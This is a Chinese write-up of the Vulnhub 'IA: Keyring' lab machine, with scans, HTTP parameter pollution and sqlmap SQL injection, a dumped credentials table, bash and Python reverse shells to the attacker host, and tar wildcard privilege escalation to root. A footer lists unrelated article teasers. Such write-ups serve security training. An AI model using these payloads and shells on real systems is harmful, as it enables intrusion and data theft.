【Vulnhub 靶场】【IA: Keyring (1.0.1)】【中等】【20210730】

1、环境介绍

靶场介绍:https://www.vulnhub.com/entry/ia-keyring-101,718/
靶场下载:https://download.vulnhub.com/ia/keyring-v1.01.ova
靶场难度:中等
发布日期:2021年07月30日
文件大小:1.1 GB
靶场作者:InfoSec Articles
靶场系列:IA
靶场描述

  • 与VMware相比,这在VirtualBox中效果更好。
  • 变更日志-2021-06-30-v1.0.1(隐私问题)-2021-06-29-v1.0.0

打靶耗时:4+小时,HPP 漏洞第一次遇到,RCE 执行权限上绕个弯耽误了些时间,SSH 用户也有弯。总结就是到处都是弯弯绕,的确好评。
打靶关键

  1. Web 目录扫描
  2. HPP 漏洞利用、SQL 注入漏洞利用
  3. Linux 信息收集、SUID 提权
  4. 可执行文件解析、tar 通配符提权

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.37   08:00:27:1a:b1:2a       PCS Systemtechnik GmbH2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.267 seconds (112.92 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.37
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-20 00:08 EST
Nmap scan report for 192.168.56.37
Host is up (0.0015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8d:eb:fd:0a:76:8a:2a:75:6e:9b:6e:7b:51:c4:28:db (RSA)
|   256 53:31:35:c0:3a:a0:48:2f:3a:79:f5:56:cd:3c:63:ee (ECDSA)
|_  256 8d:7b:d3:c9:15:61:03:b1:b5:f1:d2:ed:2c:01:55:65 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:1A:B1:2A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   1.54 ms 192.168.56.37OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.29 seconds
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap --script=vuln -p 22,80 192.168.56.37           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-20 00:10 EST
Nmap scan report for 192.168.56.37
Host is up (0.0012s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn·t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn·t find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|     Couldn·t find a file-type field.
|   
|_    Couldn·t find a file-type field.
|_http-stored-xss: Couldn·t find any stored XSS vulnerabilities.
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
| http-enum: 
|_  /login.php: Possible admin folder
MAC Address: 08:00:27:1A:B1:2A (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 31.81 seconds

3、目录扫描

# 基础小字典,初扫摸底
dirb http://192.168.56.37
# 较全面 conda activate py37
dirsearch -u http://192.168.56.37 -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.56.37" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.56.37 -lcf
# 常规文件扫描
gobuster dir -u http://192.168.56.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://192.168.56.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包,备份扫描
gobuster dir -u http://192.168.56.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q
  • http://192.168.56.37/index.php
  • http://192.168.56.37/control.php
  • http://192.168.56.37/home.php
  • http://192.168.56.37/login.php
  • http://192.168.56.37/history.php
  • http://192.168.56.37/about.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、SqlMap 登录页面「login.php」(失败)

POST /login.php HTTP/1.1
Host: 192.168.56.37
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.37
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.37/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=2hhk74mca910mj6gfgbhl5lum5
Connection: closeuname=123&upass=asd&btn=
sqlmap -r "login.txt" --level=3 --risk=3
sqlmap -o -u "http://192.168.56.37/login.php" --batch -forms --level=3 --risk=3

5、创建用户

POST /index.php HTTP/1.1
Host: 192.168.56.37
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.56.37
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.56.37/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=2hhk74mca910mj6gfgbhl5lum5
Connection: closeuname=123&upass=123&btn=

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

6、根据提示「HPP」漏洞

  • 根据「history.php」登录前后不同提示,进行 FUZZ
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ffuf -u "http://192.168.56.37/history.php?FUZZ=123" -b "PHPSESSID=2hhk74mca910mj6gfgbhl5lum5" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 1/'___\  /'___\           /'___\       /\ \__/ /\ \__/  __  __  /\ \__/       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      \ \_\   \ \_\  \ \____/  \ \_\       \/_/    \/_/   \/___/    \/_/       v2.1.0-dev
________________________________________________:: Method           : GET:: URL              : http://192.168.56.37/history.php?FUZZ=123:: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:: Header           : Cookie: PHPSESSID=2hhk74mca910mj6gfgbhl5lum5:: Follow redirects : false:: Calibration      : false:: Timeout          : 10:: Threads          : 40:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500:: Filter           : Response words: 1
________________________________________________user                    [Status: 200, Size: 95, Words: 5, Lines: 1, Duration: 26ms]
:: Progress: [6453/6453] :: Job [1/1] :: 904 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# curl http://192.168.56.37/history.php?user=123  
can·t find this user·s activity                                                                                                                      
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# curl http://192.168.56.37/history.php?user=123 --cookie "PHPSESSID=2hhk74mca910mj6gfgbhl5lum5"
Pages visited by user 123<br><br>
home<br><br>
home<br><br>
about<br><br>
home<br><br>
about<br><br>

6.1、同参数污染

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ffuf -u "http://192.168.56.37/history.php?user=123&user=FUZZ" -b "PHPSESSID=2hhk74mca910mj6gfgbhl5lum5" -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -fw 1/'___\  /'___\           /'___\       /\ \__/ /\ \__/  __  __  /\ \__/       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      \ \_\   \ \_\  \ \____/  \ \_\       \/_/    \/_/   \/___/    \/_/       v2.1.0-dev
________________________________________________:: Method           : GET:: URL              : http://192.168.56.37/history.php?user=123&user=FUZZ:: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:: Header           : Cookie: PHPSESSID=2hhk74mca910mj6gfgbhl5lum5:: Follow redirects : false:: Calibration      : false:: Timeout          : 10:: Threads          : 40:: Matcher          : Response status: 200-299,301,302,307,401,403,405,500:: Filter           : Response words: 1
________________________________________________admin                   [Status: 200, Size: 80, Words: 5, Lines: 1, Duration: 32ms]
Admin                   [Status: 200, Size: 80, Words: 5, Lines: 1, Duration: 2758ms]
:: Progress: [6453/6453] :: Job [1/1] :: 470 req/sec :: Duration: [0:00:13] :: Errors: 0 ::
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# curl "http://192.168.56.37/history.php?user=123&user=admin" --cookie "PHPSESSID=2hhk74mca910mj6gfgbhl5lum5"
Pages visited by user admin<br><br>
https://github.com/cyberbot75/keyring<br><br>

6.2、获取 Git 地址

  • 获取了MySQL 登录信息
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# git clone https://github.com/cyberbot75/keyring                                                            
正克隆到 'keyring'...
remote: Enumerating objects: 21, done.
remote: Counting objects: 100% (21/21), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 21 (delta 9), reused 0 (delta 0), pack-reused 0
接收对象中: 100% (21/21), 6.26 KiB | 6.26 MiB/s, 完成.
处理 delta 中: 100% (9/9), 完成.(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cd keyring/html(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# ls
about.php  control.php  home.php  index.php  login.php  logout.php
(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# cat login.php
......
$servername = "localhost";
$username = "root";
$password = "sqluserrootpassw0r4";
$database = "users";$conn = mysqli_connect($servername, $username, $password, $database);
......(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# cat control.php
Code for staging server<!DOCTYPE html>
<html>
<head><style>ul {list-style-type: none;margin: 0;padding: 0;overflow: hidden;background-color: #333;}li {float: left;}li a {display: block;color: white;text-align: center;padding: 14px 16px;text-decoration: none;}li a:hover {background-color: skyblue;}</style>
</head>
<body><ul><li><a class="active" href="home.php">Home</a></li><li><a href="control.php">Control</a></li><li><a href="about.php">About</a></li><li><a href="logout.php">Logout</a></li>
</ul></body>
</html><?php
session_start();
if (isset($_SESSION['name'])) {$servername = "localhost";$username = "root";$password = "sqluserrootpassw0r4";$database = "users";$conn = mysqli_connect($servername, $username, $password, $database);$name = $_SESSION['name'];$date = date('Y-m-d H:i:s');echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";$sql = "insert into log (name , page_visited , date_time) values ('$name','control','$date')";if (mysqli_query($conn, $sql)) {echo "<br><br>";echo "Date & Time : " . $date;}system($_GET['cmdcntr']); //system() function is not safe to use , dont' forget to remove it in production .
} else {header('Location: index.php');
}
?>

6.3、尝试 RCE 漏洞(失败)

  • 没有打印「Date & Time :」,实际代码与获取代码有一定偏差
  • 猜测应该都是缺少权限,或者 Cookie 一类的东西

在这里插入图片描述

7、MySQL 数据库信息收集

7.1、MySQL 登录

  • 获取了三个用户密码
www-data@keyring:/var/www/html$ mysql -u root -p
mysql -u root -p
Enter password: sqluserrootpassw0r4Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3
Server version: 5.7.34-0ubuntu0.18.04.1 (Ubuntu)Copyright (c) 2000, 2021, Oracle and/or its affiliates.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| users              |
+--------------------+
5 rows in set (0.05 sec)mysql> use users;
use users;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
show tables;
+-----------------+
| Tables_in_users |
+-----------------+
| details         |
| log             |
+-----------------+
2 rows in set (0.00 sec)mysql> select * from details;
select * from details;
+-------+-----------------------+
| name  | password              |
+-------+-----------------------+
| 123   | 123                   |
| admin | myadmin#p4szw0r4d     |
| john  | Sup3r$S3cr3t$PasSW0RD |
+-------+-----------------------+
3 rows in set (0.00 sec)

7.2、SqlMap 带 Cookie(这是一个备用方案,结果和上面一样的)

  • 获取了三个用户密码
(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -o -u "http://192.168.56.37/history.php?user=123" --cookie="PHPSESSID=2hhk74mca910mj6gfgbhl5lum5"_____H_____ ___[,]_____ ___ ___  {1.7.10#stable}
|_ -| . [(]     || . |
|___|_  [)]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user·s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 04:20:15 /2023-11-20/
......
---
Parameter: user (GET)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: user=123' AND (SELECT 9321 FROM (SELECT(SLEEP(5)))gtDn) AND 'BtUg'='BtUgType: UNION queryTitle: Generic UNION query (NULL) - 1 columnPayload: user=123' UNION ALL SELECT CONCAT(0x71716b7671,0x74626a566d4d52464f444557767149476b45496d524d784b58414c51657a614e774b41524c634d61,0x71627a6271)-- -
---
......
(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -o -u "http://192.168.56.37/history.php?user=123" --cookie="PHPSESSID=2hhk74mca910mj6gfgbhl5lum5" --dbs_____H_____ ___[)]_____ ___ ___  {1.7.10#stable}
|_ -| . [(]     || . |
|___|_  ["]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org......
[04:21:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[04:21:11] [INFO] fetching database names
[04:21:11] [WARNING] reflective value(s) found and filtering out
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] users[04:21:11] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.37'[*] ending @ 04:21:11 /2023-11-20/
(base) ┌──(root㉿kali)-[~/soft/hack/keyring/html] (๑•̀ㅂ•́)و✧ 
└─# sqlmap -o -u "http://192.168.56.37/history.php?user=123" --cookie="PHPSESSID=2hhk74mca910mj6gfgbhl5lum5" -D users --dump-all_____H_____ ___[)]_____ ___ ___  {1.7.10#stable}
|_ -| . [(]     || . |
|___|_  [(]_|_|_|__,|  _||_|V...       |_|   https://sqlmap.org......
[04:21:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 18.04 (bionic)
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[04:21:43] [INFO] fetching tables for database: 'users'
[04:21:43] [INFO] fetching columns for table 'details' in database 'users'
[04:21:43] [WARNING] reflective value(s) found and filtering out
[04:21:43] [INFO] fetching entries for table 'details' in database 'users'
Database: users
Table: details
[3 entries]
+--------+-----------------------+
| name   | password              |
+--------+-----------------------+
| 123    | 123                   |
| admin  | myadmin#p4szw0r4d     |
| john   | Sup3r$S3cr3t$PasSW0RD |
+--------+-----------------------+
......

8、登录 admin 用户

在这里插入图片描述
在这里插入图片描述

8.1、反弹连接

bash -c 'bash -i >& /dev/tcp/192.168.56.3/10086 0>&1'
# URL 编码
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.56.3%2F10086%200%3E%261%27

在这里插入图片描述

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 10086
listening on [any] 10086 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.37] 57180
bash: cannot set terminal process group (907): Inappropriate ioctl for device
bash: no job control in this shell
www-data@keyring:/var/www/html$

8.2、SSH 用户 john 登录(失败)

  • 密码在「7.1」
  • 无法直接登录,那就后面「su」切换
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh john@192.168.56.37                                                                                                      
The authenticity of host '192.168.56.37 (192.168.56.37)' can·t be established.
ED25519 key fingerprint is SHA256:9F8H2qpKYJim3wdRC0XiJaF8aTlTnjZGFW/KgrBtHjc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.37' (ED25519) to the list of known hosts.
john@192.168.56.37: Permission denied (publickey).

9、Linux 信息收集

9.1、文件信息收集

www-data@keyring:/var/www/html$ cat control.php
......
<?php
session_start();
if (isset($_SESSION['name'])) {$servername = "localhost";$username = "root";$password = "sqluserrootpassw0r4";$database = "users";$conn = mysqli_connect($servername, $username, $password, $database);$name = $_SESSION['name'];$date = date('Y-m-d H:i:s');if ($name === "admin") {echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";$sql = "insert into log (name , page_visited , date_time) values ('$name','control','$date')";if (mysqli_query($conn, $sql)) {echo "<br><br>";echo "Date & Time : " . $date;}system($_GET['cmdcntr']); //system() is not safe to use , dont' forget to remove it  in latest release .} else {echo "HTTP Parameter Pollution or HPP in short is a vulnerability that occurs<br>due to passing of multiple parameters having same name";}
} else {header('Location: index.php');
}
?>
www-data@keyring:/var/www/html$ cat history.php
<?phpsession_start();$servername = "localhost";
$username = "root";
$password = "sqluserrootpassw0r4";
$database = "users";$conn = mysqli_connect($servername, $username, $password, $database);$name = $_SESSION['name'];
$users = $_GET['user'];$sql = "select page_visited from log where name='$users'";
if (isset($name)) {$res = mysqli_query($conn, $sql);if (mysqli_num_rows($res) > 0) {echo "Pages visited by user " . $users;echo "<br><br>";while ($row = mysqli_fetch_assoc($res)) {echo $row['page_visited'];echo "<br><br>";}}
} else {echo "can't find this user's activity";
}?>

9.2、用户信息收集

在这里插入图片描述

10、SU 切换用户

  • 这里第一次「su」切换用户报错,是因为当前「shell」的问题,重新启用一个就好了,这里使用Python重新启用一个「shell」。
www-data@keyring:/var/www/html$ su john
su john
su: must be run from a terminal
www-data@keyring:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<tml$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@keyring:/var/www/html$ su john
su john
Password: Sup3r$S3cr3t$PasSW0RDTo run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.john@keyring:/var/www/html$

11、SUID 提权

john@keyring:~$ ls -al
ls -al
total 48
drwxr-x--- 3 john john  4096 Nov 20 20:24 .
drwxr-xr-x 3 root root  4096 Jun  7  2021 ..
lrwxrwxrwx 1 john john     9 Jun 20  2021 .bash_history -> /dev/null
-rw-r--r-- 1 john john   220 Jun  7  2021 .bash_logout
-rw-r--r-- 1 john john  3771 Jun  7  2021 .bashrc
-rwsr-xr-x 1 root root 16784 Jun 20  2021 compress
drwx------ 3 john john  4096 Nov 20 20:24 .gnupg
-rw-r--r-- 1 john john   807 Jun  7  2021 .profile
-rw-rw-r-- 1 john john   192 Jun 20  2021 user.txt
john@keyring:~$ cat user.txt
cat user.txt[ Keyring - User Owned ]
----------------------------------------------
Flag : VEhNe0Jhc2hfMXNfRnVuXzM4MzEzNDJ9Cg==
----------------------------------------------
by infosecarticles with <3john@keyring:~$ ./compress
./compress
/bin/tar: archive.tar: file is the archive; not dumped

11.1、文件传出

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nc -nlvp 1234 > compress  
listening on [any] 1234 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.37] 39236
john@keyring:~$ nc 192.168.56.3 1234 < /home/john/compress
nc 192.168.56.3 1234 < /home/john/compress
john@keyring:~$

11.2、文件解析

  • 关键信息:/bin/tar cf archive.tar *
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# chmod +x compress  (base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# strings ./compress    
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u+UH
[]A\A]A^A_
/bin/tar cf archive.tar *
:*3$"
GCC: (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0

11.3、tar 通配符提权

john@keyring:~$ echo "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.56.3\",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > shell.sh
john@keyring:~$ echo "" > "--checkpoint-action=exec=sh shell.sh"
john@keyring:~$ echo "" > --checkpoint=1
john@keyring:~$ ./compress
./compress
/bin/tar: archive.tar: file is the archive; not dumped
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 9002              
listening on [any] 9002 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.37] 48226
# python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.root@keyring:~# cd /root
cd /root
root@keyring:/root# ls
ls
root.txt
root@keyring:/root# cat root.txt
cat root.txt[ Keyring - Rooted ]
---------------------------------------------------
Flag : VEhNe0tleXIxbmdfUjAwdDNEXzE4MzEwNTY3fQo=
---------------------------------------------------
by infosecarticles with <3root@keyring:/root#

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/228961.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

基于Mamdani模糊神经网络的调速控制系统simulink建模与仿真

目录 1.算法运行效果图预览 2.算法运行软件版本 3.部分核心程序 4.算法理论概述 4.1 模糊神经网络控制器概述 4.2 模糊神经网络控制器基本原理 5.算法完整程序工程 1.算法运行效果图预览 2.算法运行软件版本 matlab2022a 3.部分核心程序 ............................…

UE5 项目设置

1、定义设置哪些参数 UCLASS(configEngine, globaluserconfig) class ADVMOD_API UGlobalSettings : public UObject {GENERATED_BODY()public:UGlobalSettings();const FString& GetPythonExePath() const { return PythonExePath.FilePath; }private:UPROPERTY(config, E…

【SpringBoot零基础入门到项目实战①】解锁现代Java开发之门:深度探究Spring Boot的背景、目标及选择理由

文章目录 引言Spring Boot的背景和目标背景目标 为什么选择Spring Boot1. 简化配置2. 内嵌式容器3. 生态系统支持4. 大量的Starter5. 广泛的社区支持6. 适用于微服务架构7. 丰富的扩展机制 实例演示创建一个简单的Spring Boot应用 拓展与深入学习1. Spring Boot Actuator2. Spr…

力扣刷题-二叉树-路径总和

112 路径总和 给定一个二叉树和一个目标和&#xff0c;判断该树中是否存在根节点到叶子节点的路径&#xff0c;这条路径上所有节点值相加等于目标和。 说明: 叶子节点是指没有子节点的节点。 示例: 给定如下二叉树&#xff0c;以及目标和 sum 22&#xff0c; 返回 true, 因为…

记录 | Visual Studio报错:const char*类型的值不能用于初始化char*类型

Visual Studio 报错&#xff1a; const char *”类型的值不能用于初始化“char *”类型的实体错误 解决办法&#xff1a; 1&#xff0c;强制类型转换&#xff0c;例如&#xff1a; char * Singer::pv[] {(char*)"other", (char*)"alto", (char*)"c…

1848_emacs_org-mode代码块环境

Grey 全部学习内容汇总&#xff1a; https://github.com/greyzhang/g_org 1848_emacs_org-mode代码块环境 这一部分主要是涉及到一些代码的执行、引用以及输出处理等功能。从之前我看的资料来说&#xff0c;更加偏重于可重现研究但不一定是文学式编程的必要部分。 内容来源…

git 上传大文件操作 lfs 的使用

我们要先去下载 下载后安装 我最后还是下载到了D:\git\Git\bin这个目录下 如何检查是否下载成功呢&#xff0c;用 git lfs install 在命令行运行就可以查看 下面怎么上传文件呢 首先我们还是要初始化文件的 git init 下一步输入命令 git lfs install 下一步 git lfs tra…

【小程序】-【

swiper、swiper-item轮播图 swiper是滑块视图容器。其中只可放置swiper-item组件。部分常用属性如下&#xff0c;其余属性详见&#xff1a;官方文档 <view class"banner"><swiperprevious-margin"30rpx"circularautoplayinterval"3000&q…

EasyExcel实现⭐️本地excel数据解析并保存到数据库的脚本编写,附案例实现

目录 前言 一、 EasyExcel 简介 二、实战分析 1.Controller控制层 2. service方法和方法实现 3.EasyExcel相关类 3.1 excel表实体类 3.2 自定义监听器类 4.测试 4.1 准备工作 4.2 断点调试 5.生成脚本文件 三、分析总结 章末 小伙伴们大家好&#xff0c;最近开发的时…

Ansible-playbook编译.yml脚本

1、playbook是什么&#xff1f; 在Ansible中&#xff0c;Playbook是用于配置、部署和管理被控节点的剧本。它由一个或多个play&#xff08;角色&#xff09;组成&#xff0c;每个play可以包含多个task&#xff08;台词&#xff0c;动作&#xff09;。使用Ansible的Playbook&am…

网络编程-认识套接字socket

文章目录 套接字概念端口号网络字节序 套接字类型流套接字数据报套接字 socket常见APIsocket函数bind函数listen函数accept函数connect函数sockaddr结构 套接字概念 socket套接字是进程之间一种通信机制&#xff0c;通过套接字可以在不同进程之间进行数据交流。在TCP/UDP中&…

如何开发一个prompt?prompt的使用有哪些原则?

提示词使用原则 如何开发一个跟自己预期结果接近的提示词&#xff1f;有哪些基本原则&#xff1f; 提示词迭代开发 写提示词时&#xff0c;第一次尝试是值得的&#xff0c;反复完善提示&#xff0c;获得越来越接近你想要的结果 原文来源于B站吴恩达提示工程教学公开课。…

ActionCLIP:A New Paradigm for Video Action Recognition

文章目录 ActionCLIP: A New Paradigm for Video Action Recognition动机创新点相关工作方法多模态框架新范式预训练提示微调 实验实验细节消融实验关键代码 总结相关参考 ActionCLIP: A New Paradigm for Video Action Recognition 论文&#xff1a;https://arxiv.org/abs/21…

服务端主动给客户端发消息?实战教学:使用Nestjs实现服务端推送SSE

前言 服务端消息推送SSE是常用的服务器消息通信手段&#xff0c;适用于服务器主动给客户端发送消息的场景&#xff0c;例如私信通知&#xff0c;扫描登录等都可以使用SSE实现。SSE的底层原理是客户端与服务端建立 HTTP 长链接。 Nestjs 框架内置了对SSE的支持&#xff0c;本文…

ES6 面试题 | 15.精选 ES6 面试题

&#x1f90d; 前端开发工程师&#xff08;主业&#xff09;、技术博主&#xff08;副业&#xff09;、已过CET6 &#x1f368; 阿珊和她的猫_CSDN个人主页 &#x1f560; 牛客高级专题作者、在牛客打造高质量专栏《前端面试必备》 &#x1f35a; 蓝桥云课签约作者、已在蓝桥云…

C++:函数重载

1.函数重载概念 函数重载就是用同一个函数名定义的不同函数&#xff0c;当函数名和不同的参数搭配时函数的功能和含义不同。 2.实现函数重载的条件 同一个作用域&#xff0c;参数个数不同或者参数类型不同或者参数顺序不同(满足一个即可) void func(){} void func(int x){} v…

2024美赛全方位备赛教学/翻译/写作模版/翻译/软件/资料

本文字数20000&#xff0c;文章较长&#xff0c;建议先看目录&#xff0c;点击目录条目可以快速跳转。2024美赛大学生数学建模竞赛即将开始&#xff0c;不知道大家是否已经准备好相关资料如写作模板、常见算法的编程代码等等&#xff1f;评论区处有这些资料的下载方式。 文章结…

计算机网络:数据链路层(广域网、PPP协议、HDLC协议)

今天又学会了一个知识&#xff0c;加油&#xff01; 目录 一、广域网 二、PPP协议 1、PPP协议应满足的要求 2、PPP协议无需满足的要求 3、PPP协议的三个组成部分 4、PPP协议的状态图 5、PPP协议的帧格式 三、HDLC协议 1、HDLC的站&#xff08;主站、从站、复合站&…

计算机网络:网络层(无分类编址CIDR、计算题讲解)

